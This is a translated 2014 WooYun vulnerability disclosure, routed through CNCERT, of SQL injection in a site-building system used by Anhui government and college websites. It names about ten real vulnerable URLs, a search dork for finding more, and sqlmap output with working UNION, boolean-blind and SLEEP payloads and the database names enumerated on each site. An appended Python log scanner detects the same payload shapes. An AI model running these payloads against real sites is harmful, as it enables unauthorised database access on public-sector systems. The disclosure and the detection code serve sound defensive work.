
Vulnerability Summary

Defect ID: wooyun-2014-074878

Title: SQL injection in a site-building system used in Anhui affects multiple government and school websites

Vendor: Anhui Province

Author: 浮萍

Submitted: 2014-09-03 14:53

Fixed: 2014-12-02 14:54

Disclosed: 2014-12-02 14:54

Type: SQL injection

Severity: High

Self-assessed Rank: 16

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2014-09-03: Details sent to the vendor, awaiting vendor handling
2014-09-08: Vendor confirmed; details disclosed to the vendor only
2014-09-11: Details opened to third-party security partners
2014-11-02: Details disclosed to core white hats and domain experts
2014-11-12: Details disclosed to regular white hats
2014-11-22: Details disclosed to intern white hats
2014-12-02: Details disclosed to the public

Brief description:

Heard that confirmed generic vulns come with $

Details:

Anhui Provincial Health and Family Planning Commission
http://www.ahpfpc.gov.cn/
Enter 0 in the search box

[Screenshot: Snap45.jpg]

Returns normally

[Screenshot: Snap46.jpg]

Enter 0'

[Screenshot: Snap47.jpg]

Suspected injection point: http://www.ahpfpc.gov.cn/page.php?fp=sch&key=0

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: key
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: fp=sch&key=0') UNION ALL SELECT NULL,CONCAT(0x71776b6e71,0x6969484c687078475971,0x716d6f6271),NULL#
---
[13:42:11] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: ASP.NET, Microsoft IIS 7.0
back-end DBMS: MySQL 5


Databases

available databases [10]:
[*] ahrkjj
[*] codefans_gbook
[*] dedecmsv56gbk
[*] dedecmsv57gbksp1
[*] information_schema
[*] jsw
[*] jsw0
[*] mysql
[*] test
[*] zark


Search keyword: inurl:page.php?fp=

[Screenshot: Snap49.jpg]

[Screenshot: Snap50.jpg]


Proof of vulnerability:

Anhui Hope Project Office www.ahhope.org/page.php?fp=itemdetail&id=14
Anhui Population Association http://xuehui.ahpfpc.gov.cn/page.php?fp=sch&key=0
Anhui Vocational College of Press and Publishing, admissions platform zs.ahcbxy.cn/page.php?fp=list&id=401
Anhui Vocational College of Press and Publishing www.ahcbxy.cn/page.php?fp=newsdetail&id=55448
Suzhou Municipal Population and Family Planning Commission www.ahszjsw.gov.cn/web/page.php?fp=list&id=1
Anhui Paternity Testing http://www.ahqzjd.cn/page.php?fp=sch&key=0
Anhui Provincial Health and Family Planning Commission www.ahpfpc.gov.cn/page.php?fp=sch&key=0
Government Affairs Disclosure szsp.ahcbxy.cn/page.php?fp=newsdetail&id=53896
Finance Office cw.ahcbxy.cn/page.php?fp=newsdetail&id=54978
Student Management xsgl.ahcbxy.cn/page.php?fp=newsdetail&id=1445
...........


That's enough listing.
Anhui Hope Project Office www.ahhope.org/page.php?fp=itemdetail&id=14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fp=itemdetail&id=14 AND 4095=4095
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: fp=itemdetail&id=-6773 UNION ALL SELECT CONCAT(0x71616a6471,0x45454a41784756597653,0x71627a6771),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: fp=itemdetail&id=14 AND SLEEP(5)
---


web application technology: Apache
back-end DBMS: MySQL 5.0.11


available databases [2]:
[*] ahhope
[*] information_schema


=========
Suzhou Municipal Population and Family Planning Commission www.ahszjsw.gov.cn/web/page.php?fp=list&id=1

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fp=list&id=1) AND 5367=5367 AND (2386=2386
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: fp=list&id=1) UNION ALL SELECT CONCAT(0x716e7a7671,0x484c5a79576c49654b7a,0x716d676d71),NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: fp=list&id=1) AND SLEEP(5) AND (7212=7212
---
[13:55:35] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0.11


available databases [2]:
[*] db_web376217
[*] information_schema


================
Anhui Vocational College of Press and Publishing, admissions platform zs.ahcbxy.cn/page.php?fp=list&id=401

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fp=list&id=401) AND 2976=2976 AND (2957=2957
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: fp=list&id=401) AND SLEEP(5) AND (7511=7511
---
[13:57:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.2
back-end DBMS: MySQL 5.0.11


available databases [8]:
[*] ahcbxy
[*] ahcbxy0
[*] cb
[*] information_schema
[*] jpkc
[*] mysql
[*] test
[*] txl


==========
Anhui Population Association http://xuehui.ahpfpc.gov.cn/page.php?fp=sch&key=0

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: key
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: fp=sch&key=0') UNION ALL SELECT CONCAT(0x71786a6171,0x42484b6559457455477a,0x7166686571),NULL,NULL#
---
[13:59:11] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: ASP.NET, Microsoft IIS 7.0
back-end DBMS: MySQL 5


available databases [10]:
[*] ahrkjj
[*] codefans_gbook
[*] dedecmsv56gbk
[*] dedecmsv57gbksp1
[*] information_schema
[*] jsw
[*] jsw0
[*] mysql
[*] test
[*] zark


=================
Anhui Vocational College of Press and Publishing www.ahcbxy.cn/page.php?fp=newsdetail&id=55448

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.ahcbxy.cn:80/page.php?fp=newsdetail&id=55448 AND 6181=6181
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: http://www.ahcbxy.cn:80/page.php?fp=newsdetail&id=-8712 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716c687371,0x62624f41625968497243,0x7166686971),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://www.ahcbxy.cn:80/page.php?fp=newsdetail&id=55448 AND SLEEP(5)
---
[14:01:45] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.2
back-end DBMS: MySQL 5.0.11


available databases [8]:
[*] ahcbxy
[*] ahcbxy0
[*] cb
[*] information_schema
[*] jpkc
[*] mysql
[*] test
[*] txl


=========
Anhui Paternity Testing http://www.ahqzjd.cn/page.php?fp=sch&key=0

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: key
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: fp=sch&key=0') UNION ALL SELECT NULL,CONCAT(0x71746d6371,0x557a5a684265437a634e,0x716a6c6f71),NULL#
---
[14:02:43] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: ASP.NET, Microsoft IIS 7.0
back-end DBMS: MySQL 5


available databases [10]:
[*] ahrkjj
[*] codefans_gbook
[*] dedecmsv56gbk
[*] dedecmsv57gbksp1
[*] information_schema
[*] jsw
[*] jsw0
[*] mysql
[*] test
[*] zark


=========
Won't test the rest.

Fix recommendation:

Copyright notice: when reposting, credit the source 浮萍@乌云
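Added example, not part of the original report: a Python scan over constructed web-server access-log lines (common log format assumed) that flags the three request shapes the sqlmap output above shows (UNION ... SELECT with hex CONCAT markers, AND n=n tautologies and SLEEP() delays) so a site operator running this page.php code can spot such probing in their logs. The signature names, client IPs and log lines are all constructed here.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Patterns derived from the three sqlmap techniques quoted in the report:
# UNION query, boolean-based blind (AND n=n) and time-based blind (SLEEP).
SIGNATURES = {
    "union": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "boolean": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "time": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "hex_marker": re.compile(r"\bCONCAT\s*\(\s*0x[0-9a-f]+", re.I),
}

# Common log format: client ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log lines; the query strings mirror the payload shapes quoted above.
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Sep/2014:13:42:01 +0800] "GET /page.php?fp=sch&key=0 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [03/Sep/2014:13:42:11 +0800] "GET /page.php?fp=sch&key=0%27%29%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x71776b6e71%2C0x6969484c687078475971%2C0x716d6f6271%29%2CNULL%23 HTTP/1.1" 200 5301',
    '203.0.113.5 - - [03/Sep/2014:13:42:12 +0800] "GET /page.php?fp=itemdetail&id=14%20AND%204095%3D4095 HTTP/1.1" 200 4012',
    '203.0.113.5 - - [03/Sep/2014:13:42:18 +0800] "GET /page.php?fp=list&id=1%29%20AND%20SLEEP%285%29%20AND%20%287212%3D7212 HTTP/1.1" 200 4012',
    '198.51.100.7 - - [03/Sep/2014:13:43:00 +0800] "GET /page.php?fp=newsdetail&id=55448 HTTP/1.1" 200 7788',
]

def classify_request(path):
    """Return the names of the injection signatures found in a URL-decoded request path."""
    decoded = unquote_plus(path)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(lines):
    """Return (ip, path, hits) for every parsable log line that matches a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        hits = classify_request(m.group("path"))
        if hits:
            findings.append((m.group("ip"), m.group("path"), hits))
    return findings

def suspicious_clients(lines, threshold=2):
    """Clients whose count of flagged requests reaches the threshold (scanner-like behaviour)."""
    counts = Counter(ip for ip, _, _ in scan_log(lines))
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

Running `scan_log(SAMPLE_LOG)` flags the three probing requests and leaves the two ordinary page views alone; `suspicious_clients` then groups them by client to show the scanner pattern.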


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2014-09-08 09:38

Vendor reply:

Latest status:

None yet